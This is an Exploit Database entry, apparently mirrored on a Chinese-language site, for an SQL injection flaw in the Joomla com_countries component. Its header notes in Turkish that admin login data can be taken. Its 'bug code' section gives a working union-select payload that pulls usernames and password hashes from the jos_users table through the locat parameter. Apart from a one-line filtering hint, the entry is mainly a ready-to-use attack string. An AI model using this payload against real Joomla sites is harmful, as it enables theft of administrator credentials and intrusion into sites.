Joomla! Component com_countries – SQL Injection

• Exploit Database
• 38 阅读

• 作者： FL0RiX
  日期： 2010-01-03
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/10949/

• <------------------- header data start ------------------- >
  
  #############################################################
  #Joomla Component com_countriesSQL Injection Vulnerability
  #############################################################
  
  # Author: FL0RiX
  
  # Name: com_countries
  
  # Greez : Deep-Power, PyskE,Septemb0x,KaCaK
  
  # Bug Type: SQL Injection
  
  # Infection : Admin login bilgileri alinabilir.
  
  # Demo Vuln.:
  
  http://server/index.php?option=com_countries&locat=[SQL INJ.]
  
  # Bug Fix Advice : Zararli karakterler filtrelenmelidir.
  
  #############################################################
  
  < ------------------- header data end of ------------------- >
  
  < -- bug code start -- >
  
  path/index.php?option=com_countries&locat=null/**/union/**/select/**/concat(username,0x3a,password)fl0f0r3v3r/**/from/**/jos_users
  
  < -- bug code end of -- >